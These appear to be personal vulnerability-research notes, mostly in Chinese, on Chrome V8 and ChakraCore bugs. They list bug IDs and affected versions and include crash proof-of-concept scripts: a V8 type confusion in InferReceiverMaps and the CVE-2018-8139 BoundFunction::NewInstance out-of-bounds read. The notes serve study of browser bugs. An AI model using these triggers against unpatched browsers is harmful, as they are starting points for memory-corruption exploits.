Vulnerabilities from Chrome

Chrome

Bugs:715582

6.0.92及以下

  • note
    和AST遍历访问有关,比较特别,mark一下

Bugs:732169

6.1.131及以下

CVE-2017-5115/Bugs:744584

6.2.0及以下

Bugs:746946

Bugs:752149

6.2.170及以下

Bugs:757199

6.2.363及以下

Bugs:765433

Bugs:762874

6.3.97及以下

Bugs:772420

6.4.32及以下

Bugs:776677

6.4.91及以下

Bugs:784533

6.4.289及以下

Bugs:788539

6.4.376及以下

Bugs:787910

6.4.363及以下

Bugs:791245

6.1.75-6.5.6

Bugs:791953

Bugs:794394

5.7.447-6.5.67

Bugs:794822

6.5.71及以下

Bugs:797596

6.5.107及以下

Bugs:794405/794359

Bugs:799263

6.4.66-6.5.143

Bugs:797130

Bugs:801627

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Here's a snippet of NodeProperties::InferReceiverMaps.
case IrOpcode::kJSCreate: {
if (IsSame(receiver, effect)) {
HeapObjectMatcher mtarget(GetValueInput(effect, 0));
HeapObjectMatcher mnewtarget(GetValueInput(effect, 1));
if (mtarget.HasValue() && mnewtarget.HasValue()) {
Handle<JSFunction> original_constructor =
Handle<JSFunction>::cast(mnewtarget.Value());

if (original_constructor->has_initial_map()) {
Handle<Map> initial_map(original_constructor->initial_map());
if (initial_map->constructor_or_backpointer() ==
*mtarget.Value()) {
*maps_return = ZoneHandleSet<Map>(initial_map);
return result;
}
}
}
// We reached the allocation of the {receiver}.
return kNoReceiverMaps;
}
break;
}

“mnewtarget” is expected to be a constructor which also can be of type JSBoundFunction. But “mnewtarget” is always cast to JSFunction which leads to type confusion.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
PoC:
// Flags: --allow-natives-syntax --enable_slow_asserts

class Base {
constructor() {
this.x = 1;
}
}

class Derived extends Base {
constructor() {
// JSCreate emitted I guess.
super();
}
}

let bound = Object.bind();
Reflect.construct(Derived, [], bound); // Feed a bound function as new.target to the profiler, so HeapObjectMatcher can find it.

%OptimizeFunctionOnNextCall(Derived);

new Derived();

Bugs:802060

6.6.136及以下

  • note
    看不懂2333

Bugs:802333

6.6.85及以下

Bugs:803022

6.6.45及以下

Bug: chromium:804801

6.6.54及以下

Bugs:804837

6.6.45及以下

Bugs:818144

https://bugs.chromium.org/p/chromium/issues/detail?id=818144
没找到patch

Bugs:818811

https://bugs.chromium.org/p/chromium/issues/detail?id=818811
没找到patch

Bugs:819311

6.7.26及以下

Bugs:820984

Bug:822284

6.5.245-6.7.86

Bugs:829679

6.7.245及以下

Edge

关注更新

https://github.com/Microsoft/ChakraCore/wiki/Roadmap

v1.8.3

CVE-2018-8139

  • Microsoft Edge: Chakra: A bug in BoundFunction::NewInstance
    https://bugs.chromium.org/p/project-zero/issues/detail?id=1569

  • Patch
    https://github.com/Microsoft/ChakraCore/commit/ee5dfabc51728f97f6d69e89c88af088251b6b76

  • PoC

    1
    2
    3
    4
    5
    6
    7
    function func() {
    new.target.x;//[0]->new.target跟在正常的参数之后,.x的时候会当JS对象处理,我在还原poc的时候new.target刚好是空指针,于是就读Null.x触发crash了。
    }

    let bound = func.bind({}, 1);//->boundFunction->boundArgs[i]

    Reflect.construct(bound, []);
  • Syntax
    Reflect.construct
    https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Global_Objects/Reflect/construct

    1
    Reflect.construct(target, argumentsList[, newTarget])

    不引入newTarget这个可选参数,就和new target(…args)用法一致
    但是引入的话,就是为了在一些框架里满足一种罕见的需求,也就是要求用target来初始化实例,但是却要求表现出来的结果是newTarget的实例

  • root cause
    漏洞成因是BoundFunction::NewInstance在调用Target函数时,没有考虑到CallFlags_ExtraArg这个flag,所以没有拷贝ExtraArg(这里也就是newTarget)。
    从patch里可以看到,在patch之后,考虑到了这个flag。

    1
    2
    3
    4
    +           if (args.HasExtraArg())
    + {
    + newValues[index++] = args.Values[argCount];
    + }

但仍有CallFlags_NewTarget标记
导致在后面真正调用Target函数的时候,在InterpreterStackFrame::OP_LdNewTarget时,会从栈上的Args数组越界读取8个字节的内容


  • info leak
    能不能布置栈上数据?
  • how to find?
    对标志位的处理,逻辑bug,审计?

v1.8.4

CVE-2018-8229